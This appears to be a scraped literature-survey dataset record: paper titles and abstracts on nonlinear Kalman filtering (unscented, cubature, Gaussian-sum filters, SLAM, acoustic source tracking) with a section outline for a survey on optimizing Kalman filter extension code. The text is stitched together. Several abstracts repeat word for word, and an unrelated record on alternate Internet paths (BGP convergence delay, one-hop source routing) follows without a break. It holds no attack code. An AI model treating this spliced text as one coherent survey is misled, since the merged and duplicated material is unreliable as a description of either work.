A Survey of Code Optimization Methods for Kalman Filter Extensions
--- paper_title: Recursive bayesian estimation using gaussian sums paper_content: The Bayesian recursion relations which describe the behavior of the a posteriori probability density function of the state of a time-discrete stochastic system conditioned on available measurement data cannot generally be solved in closed-form when the system is either non-linear or nongaussian. In this paper a density approximation involving convex combinations of gaussian density functions is introduced and proposed as a meaningful way of circumventing the difficulties encountered in evaluating these relations and in using the resulting densities to determine specific estimation policies. It is seen that as the number of terms in the gaussian sum increases without bound, the approximation converges uniformly to any density function in a large class. Further, any finite sum is itself a valid density function unlike many other approximations that have been investigated. The problem of determining the a posteriori density and minimum variance estimates for linear systems with nongaussian noise is treated using the gaussian sum approximation. This problem is considered because it can be dealt with in a relatively straightforward manner using the approximation but still contains most of the difficulties that one encounters in considering non-linear systems since the a posteriori density is nongaussian. After discussing the general problem from the point-of-view of applying gaussian sums, a numerical example is presented in which the actual statistics of the a posteriori density are compared with the values predicted by the gaussian sum and by the Kalman filter approximations. --- paper_title: UWB Positioning with Generalized Gaussian Mixture Filters paper_content: Low-complexity Bayesian filtering for nonlinear models is challenging. Approximative methods based on Gaussian mixtures (GM) and particle filters are able to capture multimodality, but suffer from high computational demand. In this paper, we provide an in-depth analysis of a generalized GM (GGM), which allows component weights to be negative, and requires significantly fewer components than the traditional GM for ranging models. Based on simulations and tests with real data from a network of UWB nodes, we show how the algorithm's accuracy depends on the uncertainty of the measurements. For nonlinear ranging the GGM filter outperforms the extended Kalman filter (EKF) in both positioning accuracy and consistency in environments with uncertain measurements, and requires only slightly higher computational effort when the number of measurement channels is small. In networks with highly reliable measurements, the GGM filter yields similar accuracy and better consistency than the EKF. --- paper_title: Modeling Infectious Diseases in Humans and Animals paper_content: By Matthew James Keeling and Pejman Rohani. Princeton, NJ: Princeton University Press, 2008. 408 pp., Illustrated. $65.00 (hardcover). Mathematical modeling of infectious diseases has progressed dramatically over the past 3 decades and continues to flourish at the nexus of mathematics, epidemiology, and infectious diseases research. Now recognized as a valuable tool, mathematical models are being integrated into the public health decision-making process more than ever before. However, despite rapid advancements in this area, a formal training program for mathematical modeling is lacking, and there are very few books suitable for a broad readership.
To support this bridging science, a common language that is understood in all contributing disciplines is required. --- paper_title: A Bayesian approach to problems in stochastic estimation and control paper_content: In this paper, a general class of stochastic estimation and control problems is formulated from the Bayesian Decision-Theoretic viewpoint. A discussion as to how these problems can be solved step by step in principle and practice from this approach is presented. As a specific example, the closed form Wiener-Kalman solution for linear estimation in Gaussian noise is derived. The purpose of the paper is to show that the Bayesian approach provides: 1) a general unifying framework within which to pursue further researches in stochastic estimation and control problems, and 2) the necessary computations and difficulties that must be overcome for these problems. An example of a nonlinear, non-Gaussian estimation problem is also solved. --- paper_title: Estimation with Applications to Tracking and Navigation paper_content: From the Publisher: "Estimation with Applications to Tracking and Navigation treats the estimation of various quantities from inherently inaccurate remote observations. It explains state estimator design using a balanced combination of linear systems, probability, and statistics." "The authors provide a review of the necessary background mathematical techniques and offer an overview of the basic concepts in estimation. They then provide detailed treatments of all the major issues in estimation with a focus on applying these techniques to real systems." "Suitable for graduate engineering students and engineers working in remote sensors and tracking, Estimation with Applications to Tracking and Navigation provides expert coverage of this important area."--BOOK JACKET. --- paper_title: State space regularization in the nonstationary inverse problem for diffuse optical tomography paper_content: In this paper, we present a regularization method in the nonstationary inverse problem for diffuse optical tomography (DOT). The regularization is based on a choosing time evolution process such that in a stationary state it has a covariance function which corresponds to a process with similar smoothness properties as the first-order smoothness Tikhonov regularization. The proposed method is computationally more lightweight than the method where the regularization is augmented as a measurement. The method was tested in the case of the inverse problem of DOT. A solid phantom with optical properties similar to tissue was made, incorporating two moving parts that simulate two different physiological processes: a localized change in absorption and a surrounding rotating two-part shell which simulates slow oscillations in the tissue background physiology. A sequence of measurements of the phantom was made and the reconstruction of the image sequence was computed using this method. It allows the recovery of the full time series of images from relatively slow measurements with one source active at a time. In practice, this allows instruments with a larger dynamic range to be applied to the imaging of functional phenomena using DOT. --- paper_title: Gaussian filters for nonlinear filtering problems paper_content: We develop and analyze real-time and accurate filters for nonlinear filtering problems based on the Gaussian distributions. We present the systematic formulation of Gaussian filters and develop efficient and accurate numerical integration of the optimal filter.
We also discuss the mixed Gaussian filters in which the conditional probability density is approximated by the sum of Gaussian distributions. A new update rule of weights for Gaussian sum filters is proposed. Our numerical tests demonstrate that new filters significantly improve the extended Kalman filter with no additional cost, and the new Gaussian sum filter has a nearly optimal performance. --- paper_title: Rao-Blackwellised Particle Filtering for Dynamic Bayesian Networks paper_content: Particle filters (PFs) are powerful sampling-based inference/learning algorithms for dynamic Bayesian networks (DBNs). They allow us to treat, in a principled way, any type of probability distribution, nonlinearity and non-stationarity. They have appeared in several fields under such names as "condensation", "sequential Monte Carlo" and "survival of the fittest". In this paper, we show how we can exploit the structure of the DBN to increase the efficiency of particle filtering, using a technique known as Rao-Blackwellisation. Essentially, this samples some of the variables, and marginalizes out the rest exactly, using the Kalman filter, HMM filter, junction tree algorithm, or any other finite dimensional optimal filter. We show that Rao-Blackwellised particle filters (RBPFs) lead to more accurate estimates than standard PFs. We demonstrate RBPFs on two problems, namely non-stationary online regression with radial basis function networks and robot localization and map building. We also discuss other potential application areas and provide references to some finite dimensional optimal filters. --- paper_title: Cubature Kalman Filters paper_content: In this paper, we present a new nonlinear filter for high-dimensional state estimation, which we have named the cubature Kalman filter (CKF). The heart of the CKF is a spherical-radial cubature rule, which makes it possible to numerically compute multivariate moment integrals encountered in the nonlinear Bayesian filter. Specifically, we derive a third-degree spherical-radial cubature rule that provides a set of cubature points scaling linearly with the state-vector dimension. The CKF may therefore provide a systematic solution for high-dimensional nonlinear filtering problems. The paper also includes the derivation of a square-root version of the CKF for improved numerical stability. The CKF is tested experimentally in two nonlinear state estimation problems. In the first problem, the proposed cubature rule is used to compute the second-order statistics of a nonlinearly transformed Gaussian random variable. The second problem addresses the use of the CKF for tracking a maneuvering aircraft. The results of both experiments demonstrate the improved performance of the CKF over conventional nonlinear filters. --- paper_title: New developments in state estimation for nonlinear systems paper_content: Based on an interpolation formula, accurate state estimators for nonlinear systems can be derived. The estimators do not require derivative information which makes them simple to implement. --- paper_title: State space regularization in the nonstationary inverse problem for diffuse optical tomography paper_content: In this paper, we present a regularization method in the nonstationary inverse problem for diffuse optical tomography (DOT). 
The regularization is based on a choosing time evolution process such that in a stationary state it has a covariance function which corresponds to a process with similar smoothness properties as the first-order smoothness Tikhonov regularization. The proposed method is computationally more lightweight than the method where the regularization is augmented as a measurement. The method was tested in the case of the inverse problem of DOT. A solid phantom with optical properties similar to tissue was made, incorporating two moving parts that simulate two different physiological processes: a localized change in absorption and a surrounding rotating two-part shell which simulates slow oscillations in the tissue background physiology. A sequence of measurements of the phantom was made and the reconstruction of the image sequence was computed using this method. It allows the recovery of the full time series of images from relatively slow measurements with one source active at a time. In practice, this allows instruments with a larger dynamic range to be applied to the imaging of functional phenomena using DOT. --- paper_title: The unscented Kalman filter for nonlinear estimation paper_content: This paper points out the flaws in using the extended Kalman filter (EKE) and introduces an improvement, the unscented Kalman filter (UKF), proposed by Julier and Uhlman (1997). A central and vital operation performed in the Kalman filter is the propagation of a Gaussian random variable (GRV) through the system dynamics. In the EKF the state distribution is approximated by a GRV, which is then propagated analytically through the first-order linearization of the nonlinear system. This can introduce large errors in the true posterior mean and covariance of the transformed GRV, which may lead to sub-optimal performance and sometimes divergence of the filter. The UKF addresses this problem by using a deterministic sampling approach. The state distribution is again approximated by a GRV, but is now represented using a minimal set of carefully chosen sample points. These sample points completely capture the true mean and covariance of the GRV, and when propagated through the true nonlinear system, captures the posterior mean and covariance accurately to the 3rd order (Taylor series expansion) for any nonlinearity. The EKF in contrast, only achieves first-order accuracy. Remarkably, the computational complexity of the UKF is the same order as that of the EKF. Julier and Uhlman demonstrated the substantial performance gains of the UKF in the context of state-estimation for nonlinear control. Machine learning problems were not considered. We extend the use of the UKF to a broader class of nonlinear estimation problems, including nonlinear system identification, training of neural networks, and dual estimation problems. In this paper, the algorithms are further developed and illustrated with a number of additional examples. --- paper_title: Gaussian Filter based on Deterministic Sampling for High Quality Nonlinear Estimation paper_content: In this paper, a Gaussian filter for nonlinear Bayesian estimation is introduced that is based on a deterministic sample selection scheme. For an effective sample selection, a parametric density function representation of the sample points is employed, which allows approximating the cumulative distribution function of the prior Gaussian density. 
The computationally demanding parts of the optimization problem formulated for approximation are carried out off-line for obtaining an efficient filter, whose estimation quality can be altered by adjusting the number of used sample points. The improved performance of the proposed Gaussian filter compared to the well-known unscented Kalman filter is demonstrated by means of two examples. --- paper_title: Gaussian filters for nonlinear filtering problems paper_content: We develop and analyze real-time and accurate filters for nonlinear filtering problems based on the Gaussian distributions. We present the systematic formulation of Gaussian filters and develop efficient and accurate numerical integration of the optimal filter. We also discuss the mixed Gaussian filters in which the conditional probability density is approximated by the sum of Gaussian distributions. A new update rule of weights for Gaussian sum filters is proposed. Our numerical tests demonstrate that new filters significantly improve the extended Kalman filter with no additional cost, and the new Gaussian sum filter has a nearly optimal performance. --- paper_title: Stochastic Processes and Filtering Theory paper_content: This book presents a unified treatment of linear and nonlinear filtering theory for engineers, with sufficient emphasis on applications to enable the reader to use the theory. The need for this book is twofold. First, although linear estimation theory is relatively well known, it is largely scattered in the journal literature and has not been collected in a single source. Second, available literature on the continuous nonlinear theory is quite esoteric and controversial, and thus inaccessible to engineers uninitiated in measure theory and stochastic differential equations. Furthermore, it is not clear from the available literature whether the nonlinear theory can be applied to practical engineering problems. In attempting to fill the stated needs, the author has retained as much mathematical rigor as he felt was consistent with the prime objective" to explain the theory to engineers. Thus, the author has avoided measure theory in this book by using mean square convergence, on the premise that everyone knows how to average. As a result, the author only requires of the reader background in advanced calculus, theory of ordinary differential equations, and matrix analysis. --- paper_title: Optimization of the Simultaneous Localization and Map Building Algorithm for Real Time Implementation paper_content: Addresses real-time implementation of the simultaneous localization and map-building (SLAM) algorithm. It presents optimal algorithms that consider the special form of the matrices and a new compressed filler that can significantly reduce the computation requirements when working in local areas or with high frequency external sensors. It is shown that by extending the standard Kalman filter models the information gained in a local area can be maintained with a cost /spl sim/O(N/sub a//sup 2/), where N/sub a/ is the number of landmarks in the local area, and then transferred to the overall map in only one iteration at full SLAM computational cost. Additional simplifications are also presented that are very close to optimal when an appropriate map representation is used. Finally the algorithms are validated with experimental results obtained with a standard vehicle running in a completely unstructured outdoor environment. 
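The unscented Kalman filter abstract above describes replacing first-order linearization with a small, deterministically chosen set of sample points that are propagated through the nonlinearity. As a rough illustration of that idea, here is a minimal sketch of the commonly used scaled unscented transform in Python/NumPy; the parameters alpha, beta and kappa and their defaults are illustrative assumptions, not values taken from the cited papers.

```python
import numpy as np

def unscented_transform(mean, cov, f, alpha=1e-3, beta=2.0, kappa=0.0):
    """Propagate a Gaussian (mean, cov) through a nonlinear function f
    using 2n+1 deterministically chosen sigma points (scaled form)."""
    n = mean.shape[0]
    lam = alpha ** 2 * (n + kappa) - n
    S = np.linalg.cholesky((n + lam) * cov)             # square root of the scaled covariance
    sigmas = np.vstack([mean, mean + S.T, mean - S.T])  # (2n+1, n) sigma points

    wm = np.full(2 * n + 1, 1.0 / (2.0 * (n + lam)))    # mean weights
    wc = wm.copy()                                      # covariance weights
    wm[0] = lam / (n + lam)
    wc[0] = lam / (n + lam) + (1.0 - alpha ** 2 + beta)

    Y = np.array([f(s) for s in sigmas])                # transformed sigma points
    y_mean = wm @ Y
    diff = Y - y_mean
    y_cov = (wc[:, None] * diff).T @ diff
    return y_mean, y_cov
```

Applying the same transform to a measurement function and adding the measurement noise covariance to y_cov gives the innovation covariance used in a UKF-style update.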
--- paper_title: Nonlinear Kalman Filtering for Force-Controlled Robot Tasks paper_content: Introduction.- Literature Survey: Autonomous Compliant Motion.- Literature Survey: Bayesian Probability Theory.- Kalman Filters for Nonlinear Systems.- The Non-Minimal State Kalman Filter.- Contact Modelling.- Geometrical Parameter Estimation and CF Recognition.- Experiment: A Cube-In-Corner Assembly.- Task Planning with Active Sensing.- General Conclusions. --- paper_title: Reduced Sigma Point Filtering for Partially Linear Models paper_content: A method for performing unscented Kalman filtering with a reduced number of sigma points is proposed. The procedure is applicable when either the process or measurement equations are partially linear in the sense that only a subset of the elements of the state vector undergo a nonlinear transformation. It is shown that for such models second-order accuracy in the moments required for the unscented Kalman filter recursion can be obtained using a number of sigma points determined by the number of nonlinearly transformed elements rather than the dimension of the state vector. A procedure for computing the sigma points is developed. An application of the proposed method to smoothed target state estimation from bearings measurements is presented. --- paper_title: State space regularization in the nonstationary inverse problem for diffuse optical tomography paper_content: In this paper, we present a regularization method in the nonstationary inverse problem for diffuse optical tomography (DOT). The regularization is based on a choosing time evolution process such that in a stationary state it has a covariance function which corresponds to a process with similar smoothness properties as the first-order smoothness Tikhonov regularization. The proposed method is computationally more lightweight than the method where the regularization is augmented as a measurement. The method was tested in the case of the inverse problem of DOT. A solid phantom with optical properties similar to tissue was made, incorporating two moving parts that simulate two different physiological processes: a localized change in absorption and a surrounding rotating two-part shell which simulates slow oscillations in the tissue background physiology. A sequence of measurements of the phantom was made and the reconstruction of the image sequence was computed using this method. It allows the recovery of the full time series of images from relatively slow measurements with one source active at a time. In practice, this allows instruments with a larger dynamic range to be applied to the imaging of functional phenomena using DOT. --- paper_title: A rao-blackwellised unscented Kalman filter paper_content: The Unscented Kalman Filter oflers sign$- cant improvements in the estimation of non-linear discrete- time models in comparison to the Extended Kalman Fil- ter 1121. In this paper we use a technique introduced by Casella and Robert (2), known as Rao-Blackwellisation, to calculate the tractable integrations that are found in the Unscented Kalman Filter: We show that this leads to a re- duction in the quasi-Monte Carlo variance, and a decrease in the computational complexity by considering a common tracking problem. --- paper_title: Gaussian Filtering using state decomposition methods paper_content: State estimation for nonlinear systems generally requires approximations of the system or the probability densities, as the occurring prediction and filtering equations cannot be solved in closed form. 
For instance, Linear Regression Kalman Filters like the Unscented Kalman Filter or the considered Gaussian Filter propagate a small set of sample points through the system to approximate the posterior mean and covariance matrix. To reduce the number of sample points, special structures of the system and measurement equation can be taken into account. In this paper, two principles of system decomposition are considered and applied to the Gaussian Filter. One principle exploits that only a part of the state vector is directly observed by the measurement. The second principle separates the system equations into linear and nonlinear parts in order to merely approximate the nonlinear part of the state. The benefits of both decompositions are demonstrated on a real-world example. --- paper_title: An Unscented Transformation for Conditionally Linear Models paper_content: A new method of applying the unscented transformation to conditionally linear transformations of Gaussian random variables is proposed. This method exploits the structure of the model to reduce the required number of sigma points. A common application of the unscented transformation is to nonlinear filtering where it used to approximate the moments required in the Kalman filter recursion. The proposed procedure is applied to a nonlinear filtering problem which involves tracking a falling object. --- paper_title: Optimization of the Simultaneous Localization and Map Building Algorithm for Real Time Implementation paper_content: Addresses real-time implementation of the simultaneous localization and map-building (SLAM) algorithm. It presents optimal algorithms that consider the special form of the matrices and a new compressed filler that can significantly reduce the computation requirements when working in local areas or with high frequency external sensors. It is shown that by extending the standard Kalman filter models the information gained in a local area can be maintained with a cost /spl sim/O(N/sub a//sup 2/), where N/sub a/ is the number of landmarks in the local area, and then transferred to the overall map in only one iteration at full SLAM computational cost. Additional simplifications are also presented that are very close to optimal when an appropriate map representation is used. Finally the algorithms are validated with experimental results obtained with a standard vehicle running in a completely unstructured outdoor environment. --- paper_title: Nonlinear Kalman Filtering for Force-Controlled Robot Tasks paper_content: Introduction.- Literature Survey: Autonomous Compliant Motion.- Literature Survey: Bayesian Probability Theory.- Kalman Filters for Nonlinear Systems.- The Non-Minimal State Kalman Filter.- Contact Modelling.- Geometrical Parameter Estimation and CF Recognition.- Experiment: A Cube-In-Corner Assembly.- Task Planning with Active Sensing.- General Conclusions. --- paper_title: Kullback-Leibler Divergence Approach to Partitioned Update Kalman Filter paper_content: Kalman filtering is a widely used framework for Bayesian estimation. The partitioned update Kalman filter applies a Kalman filter update in parts so that the most linear parts of measurements are applied first. In this paper, we generalize partitioned update Kalman filter, which requires the use of the second order extended Kalman filter, so that it can be used with any Kalman filter extension such as the unscented Kalman filter. 
To do so, we use a Kullback-Leibler divergence approach to measure the nonlinearity of the measurement, which is theoretically more sound than the nonlinearity measure used in the original partitioned update Kalman filter. Results show that the use of the proposed partitioned update filter improves the estimation accuracy. --- paper_title: Particle filter and smoother for indoor localization paper_content: We present a real-time particle filter for 2D and 3D hybrid indoor positioning. It uses wireless local area network (WLAN) based position measurements, step and turn detection from a hand-held inertial sensor unit, floor plan restrictions, altitude change measurements from barometer and possibly other measurements such as occasional GNSS fixes. We also present a particle smoother, which uses future measurements to improve the position estimate for non-real-time applications. A light-weight fallback filter is run in the background for initialization, divergence monitoring and possibly re-initialization. In real-data tests the particle filter is more accurate and consistent than the methods that do not use floor plans. An example is shown on how smoothing helps to improve the filter estimate. Moreover, a floor change case is presented, in which the filter is capable of detecting the floor change and improving the 2D accuracy using the floor change information. --- paper_title: A TDOA Gaussian mixture model for improving acoustic source tracking paper_content: Traditionally, time difference of arrival (TDOA) based acoustic source tracking consists of two stages, more precisely, estimation of TDOAs followed by a tracking algorithm. In general, these two stages are performed separately and presume that (1) TDOAs can be estimated reliably; and (2) the errors in detection behave in a well-defined fashion. The presence of noise and reverberation, however, leads to multimodal TDOA distributions and causes larger errors in the estimates, which ultimately lowers the tracking performance. To counteract this effect, we propose an approach that enhances TDOA estimation by (1) accounting for the multimodal aspect through a Gaussian mixture model and (2) integrating knowledge that has been obtained in the tracking stage. In doing so, this approach tightly couples the two stages. Experimental results on the AV16.3 corpus show that the proposed approach significantly improves the tracking performance compared to various other tracking algorithms. --- paper_title: The huge microphone array paper_content: The Huge Microphone Array project began in February 1994 to design, construct, debug, and test a real-time 512-microphone array system and to develop algorithms for it. Analysis of known algorithms indicated that signal-processing performance of over 6 Gflops would be required, while the need for portability-fitting it into a small van-also set an upper limit to the power required. These trade-offs and many others have led to a unique design in both hardware and software. This two-part article presents the full design and its justifications. The authors also discuss performance for a few important algorithms relative to the use of processing capability, response latency, and difficulty of programming. --- paper_title: System for robust 3D speaker tracking using microphone array measurements paper_content: A system for three-dimensional passive acoustic speaker localization and tracking using a microphone array is presented and evaluated. 
Initial speaker position estimates are provided by a time-delay-based localization algorithm. These raw estimates are spatially smoothed by a multiple model adaptive estimator consisting of three extended Kalman filters running in parallel. The performance of the proposed system is evaluated for real data in a common office environment. The reference trajectory of the moving speaker is delivered by visually tracking a color marker on the speaker's forehead by a stereo-camera system. The proposed acoustic source tracker shows robustness and accuracy in a variety of different scenarios. --- paper_title: Design of Sigma-Point Kalman Filter with Recursive Updated Measurement paper_content: In this study, the authors focus on improving measurement update of existing nonlinear Kalman approximation filter and propose a new sigma-point Kalman filter with recursive measurement update. Statistical linearization technique based on sigma transformation is utilized in the proposed filter to linearize the nonlinear measurement function, and linear measurement update is applied gradually and repeatedly based on the statistically linearized measurement equation. The total measurement update of the proposed filter is nonlinear, and the proposed filter can extract state information from nonlinear measurement better than existing nonlinear filters. Simulation results show that the proposed method has higher estimation accuracy than existing methods. --- paper_title: Recursive Update Filtering for Nonlinear Estimation paper_content: Nonlinear filters are often very computationally expensive and usually not suitable for real-time applications. Real-time navigation algorithms are typically based on linear estimators, such as the extended Kalman filter (EKF) and, to a much lesser extent, the unscented Kalman filter. This work proposes a novel nonlinear estimator whose additional computational cost is comparable to (N-1) EKF updates, where N is the number of recursions, a tuning parameter. The higher N the less the filter relies on the linearization assumption. A second algorithm is proposed with a differential update, which is equivalent to the recursive update as N tends to infinity. --- paper_title: Design of Sigma-Point Kalman Filter with Recursive Updated Measurement paper_content: In this study, the authors focus on improving measurement update of existing nonlinear Kalman approximation filter and propose a new sigma-point Kalman filter with recursive measurement update. Statistical linearization technique based on sigma transformation is utilized in the proposed filter to linearize the nonlinear measurement function, and linear measurement update is applied gradually and repeatedly based on the statistically linearized measurement equation. The total measurement update of the proposed filter is nonlinear, and the proposed filter can extract state information from nonlinear measurement better than existing nonlinear filters. Simulation results show that the proposed method has higher estimation accuracy than existing methods. --- paper_title: Recursive Update Filtering for Nonlinear Estimation paper_content: Nonlinear filters are often very computationally expensive and usually not suitable for real-time applications. Real-time navigation algorithms are typically based on linear estimators, such as the extended Kalman filter (EKF) and, to a much lesser extent, the unscented Kalman filter. 
This work proposes a novel nonlinear estimator whose additional computational cost is comparable to (N-1) EKF updates, where N is the number of recursions, a tuning parameter. The higher N the less the filter relies on the linearization assumption. A second algorithm is proposed with a differential update, which is equivalent to the recursive update as N tends to infinity. --- paper_title: Cubature Kalman Filters paper_content: In this paper, we present a new nonlinear filter for high-dimensional state estimation, which we have named the cubature Kalman filter (CKF). The heart of the CKF is a spherical-radial cubature rule, which makes it possible to numerically compute multivariate moment integrals encountered in the nonlinear Bayesian filter. Specifically, we derive a third-degree spherical-radial cubature rule that provides a set of cubature points scaling linearly with the state-vector dimension. The CKF may therefore provide a systematic solution for high-dimensional nonlinear filtering problems. The paper also includes the derivation of a square-root version of the CKF for improved numerical stability. The CKF is tested experimentally in two nonlinear state estimation problems. In the first problem, the proposed cubature rule is used to compute the second-order statistics of a nonlinearly transformed Gaussian random variable. The second problem addresses the use of the CKF for tracking a maneuvering aircraft. The results of both experiments demonstrate the improved performance of the CKF over conventional nonlinear filters. --- paper_title: Nonlinear Kalman Filtering for Force-Controlled Robot Tasks paper_content: Introduction.- Literature Survey: Autonomous Compliant Motion.- Literature Survey: Bayesian Probability Theory.- Kalman Filters for Nonlinear Systems.- The Non-Minimal State Kalman Filter.- Contact Modelling.- Geometrical Parameter Estimation and CF Recognition.- Experiment: A Cube-In-Corner Assembly.- Task Planning with Active Sensing.- General Conclusions. --- paper_title: New developments in state estimation for nonlinear systems paper_content: Based on an interpolation formula, accurate state estimators for nonlinear systems can be derived. The estimators do not require derivative information which makes them simple to implement. --- paper_title: The unscented Kalman filter for nonlinear estimation paper_content: This paper points out the flaws in using the extended Kalman filter (EKE) and introduces an improvement, the unscented Kalman filter (UKF), proposed by Julier and Uhlman (1997). A central and vital operation performed in the Kalman filter is the propagation of a Gaussian random variable (GRV) through the system dynamics. In the EKF the state distribution is approximated by a GRV, which is then propagated analytically through the first-order linearization of the nonlinear system. This can introduce large errors in the true posterior mean and covariance of the transformed GRV, which may lead to sub-optimal performance and sometimes divergence of the filter. The UKF addresses this problem by using a deterministic sampling approach. The state distribution is again approximated by a GRV, but is now represented using a minimal set of carefully chosen sample points. These sample points completely capture the true mean and covariance of the GRV, and when propagated through the true nonlinear system, captures the posterior mean and covariance accurately to the 3rd order (Taylor series expansion) for any nonlinearity. 
The EKF in contrast, only achieves first-order accuracy. Remarkably, the computational complexity of the UKF is the same order as that of the EKF. Julier and Uhlman demonstrated the substantial performance gains of the UKF in the context of state-estimation for nonlinear control. Machine learning problems were not considered. We extend the use of the UKF to a broader class of nonlinear estimation problems, including nonlinear system identification, training of neural networks, and dual estimation problems. In this paper, the algorithms are further developed and illustrated with a number of additional examples. --- paper_title: Gaussian Filter based on Deterministic Sampling for High Quality Nonlinear Estimation paper_content: In this paper, a Gaussian filter for nonlinear Bayesian estimation is introduced that is based on a deterministic sample selection scheme. For an effective sample selection, a parametric density function representation of the sample points is employed, which allows approximating the cumulative distribution function of the prior Gaussian density. The computationally demanding parts of the optimization problem formulated for approximation are carried out off-line for obtaining an efficient filter, whose estimation quality can be altered by adjusting the number of used sample points. The improved performance of the proposed Gaussian filter compared to the well-known unscented Kalman filter is demonstrated by means of two examples. --- paper_title: Gaussian filters for nonlinear filtering problems paper_content: We develop and analyze real-time and accurate filters for nonlinear filtering problems based on the Gaussian distributions. We present the systematic formulation of Gaussian filters and develop efficient and accurate numerical integration of the optimal filter. We also discuss the mixed Gaussian filters in which the conditional probability density is approximated by the sum of Gaussian distributions. A new update rule of weights for Gaussian sum filters is proposed. Our numerical tests demonstrate that new filters significantly improve the extended Kalman filter with no additional cost, and the new Gaussian sum filter has a nearly optimal performance. --- paper_title: Stochastic Processes and Filtering Theory paper_content: This book presents a unified treatment of linear and nonlinear filtering theory for engineers, with sufficient emphasis on applications to enable the reader to use the theory. The need for this book is twofold. First, although linear estimation theory is relatively well known, it is largely scattered in the journal literature and has not been collected in a single source. Second, available literature on the continuous nonlinear theory is quite esoteric and controversial, and thus inaccessible to engineers uninitiated in measure theory and stochastic differential equations. Furthermore, it is not clear from the available literature whether the nonlinear theory can be applied to practical engineering problems. In attempting to fill the stated needs, the author has retained as much mathematical rigor as he felt was consistent with the prime objective" to explain the theory to engineers. Thus, the author has avoided measure theory in this book by using mean square convergence, on the premise that everyone knows how to average. As a result, the author only requires of the reader background in advanced calculus, theory of ordinary differential equations, and matrix analysis. ---
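The cubature Kalman filter abstract above relies on a third-degree spherical-radial rule whose number of points grows linearly with the state dimension. A minimal sketch of that point set, assuming the commonly published form with 2n equally weighted points (helper names are illustrative):

```python
import numpy as np

def cubature_points(mean, cov):
    """Third-degree spherical-radial cubature rule: 2n equally weighted
    points at mean +/- sqrt(n) times the columns of a square root of cov."""
    n = mean.shape[0]
    L = np.linalg.cholesky(cov)
    offsets = np.sqrt(n) * L                             # column i is the i-th offset
    pts = np.hstack([mean[:, None] + offsets, mean[:, None] - offsets]).T
    weights = np.full(2 * n, 1.0 / (2 * n))
    return pts, weights                                  # shapes (2n, n) and (2n,)

# Propagation through a nonlinearity then mirrors the sigma-point sketch above:
# the predicted mean is the weighted sum of the transformed points, and the
# covariance is formed from their weighted outer products.
```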
Title: A Survey of Code Optimization Methods for Kalman Filter Extensions
Section 1: Introduction
Description 1: Introduce the application areas of Bayesian state estimation and Kalman Filter Extensions (KFEs), and outline the workflow of the paper.
Section 2: Notations
Description 2: List and describe the variables and notations used throughout the paper.
Section 3: Background
Description 3: Provide the background of discrete-time Bayesian filtering and various Kalman Filter Extensions.
Section 4: Partially Linear Functions
Description 4: Discuss algorithms for treating different setups of UKF and improving computation efficiency with partially linear state and measurement models.
Section 5: Conditionally Linear Measurements
Description 5: Present algorithms for handling conditionally linear state variables using sigma-points and other optimization techniques.
Section 6: Part of State Is Unobserved and Static
Description 6: Examine situations where some state variables are unobserved and static, and describe the corresponding optimization algorithms.
Section 7: Part of State Is Unobserved and Whole State Is Static
Description 7: Explore optimization methods for cases where all state variables are static and partially unobserved.
Section 8: Block Diagonal Measurement Covariance
Description 8: Describe the optimization of the Kalman gain computation using block diagonal measurement covariance.
Section 9: Applying the Matrix Inversion Lemma to Innovation Covariance
Description 9: Explain the optimization of the inverse of the innovation covariance using the matrix inversion lemma.
Section 10: Pedestrian Dead Reckoning
Description 10: Provide a case study on applying the surveyed optimization techniques to pedestrian dead reckoning systems.
Section 11: Optimization of Iterative KFEs
Description 11: Discuss the application of the optimizations to iterative KFE algorithms like Recursive Update Filter (RUF).
Section 12: Conclusions
Description 12: Summarize the contributions of the survey, highlighting the unification and general notation of various optimization methods.
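Section 9 of the outline above concerns applying the matrix inversion lemma to the innovation covariance. As a hedged illustration of what that optimization typically looks like (a generic textbook identity, not an equation quoted from the survey): for a linearized measurement model with Jacobian H, prior covariance P and measurement noise covariance R, the innovation covariance S = H P H^T + R can be inverted as

```latex
S^{-1} = \left(H P H^{\mathsf{T}} + R\right)^{-1}
       = R^{-1} - R^{-1} H \left(P^{-1} + H^{\mathsf{T}} R^{-1} H\right)^{-1} H^{\mathsf{T}} R^{-1}
```

When R is diagonal or block diagonal its inverse is cheap, so the dominant cost becomes inverting a matrix in the state dimension rather than in the measurement dimension, which pays off when there are many more measurements than state variables.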
Finding Alternate Paths in the Internet: A Survey of Techniques for End-to-End Path Discovery
--- paper_title: Delayed Internet routing convergence paper_content: This paper examines the latency in Internet path failure, failover, and repair due to the convergence properties of interdomain routing. Unlike circuit-switched paths which exhibit failover on the order of milliseconds, our experimental measurements show that interdomain routers in the packet-switched Internet may take tens of minutes to reach a consistent view of the network topology after a fault. These delays stem from temporary routing table fluctuations formed during the operation of the border gateway protocol (BGP) path selection process on the Internet backbone routers. During these periods of delayed convergence, we show that end-to-end Internet paths will experience intermittent loss of connectivity, as well as increased packet loss and latency. We present a two-year study of Internet routing convergence through the experimental instrumentation of key portions of the Internet infrastructure, including both passive data collection and fault-injection machines at major Internet exchange points. Based on data from the injection and measurement of several hundred thousand interdomain routing faults, we describe several unexpected properties of convergence and show that the measured upper bound on Internet interdomain routing convergence delay is an order of magnitude slower than previously thought. Our analysis also shows that the upper theoretic computational bound on the number of router states and control messages exchanged during the process of BGP convergence is factorial with respect to the number of autonomous systems in the Internet. Finally, we demonstrate that much of the observed convergence delay stems from specific router vendor implementation decisions and ambiguity in the BGP specification. --- paper_title: Improving the Reliability of Internet Paths with One-hop Source Routing paper_content: Recent work has focused on increasing availability in the face of Internet path failures. To date, proposed solutions have relied on complex routing and path-monitoring schemes, trading scalability for availability among a relatively small set of hosts. ::: ::: This paper proposes a simple, scalable approach to recover from Internet path failures. Our contributions are threefold. First, we conduct a broad measurement study of Internet path failures on a collection of 3,153 Internet destinations consisting of popular Web servers, broad-band hosts, and randomly selected nodes. We monitored these destinations from 67 PlanetLab vantage points over a period of seven days, and found availabilities ranging from 99.6% for servers to 94.4% for broadband hosts. When failures do occur, many appear too close to the destination (e.g., last-hop and end-host failures) to be mitigated through alternative routing techniques of any kind. Second, we show that for the failures that can be addressed through routing, a simple, scalable technique, called one-hop source routing, can achieve close to the maximum benefit available with very low overhead. When a path failure occurs, our scheme attempts to recover from it by routing indirectly through a small set of randomly chosen intermediaries. ::: ::: Third, we implemented and deployed a prototype one-hop source routing infrastructure on PlanetLab. Over a three day period, we repeatedly fetched documents from 982 popular Internet Web servers and used one-hop source routing to attempt to route around the failures we observed. 
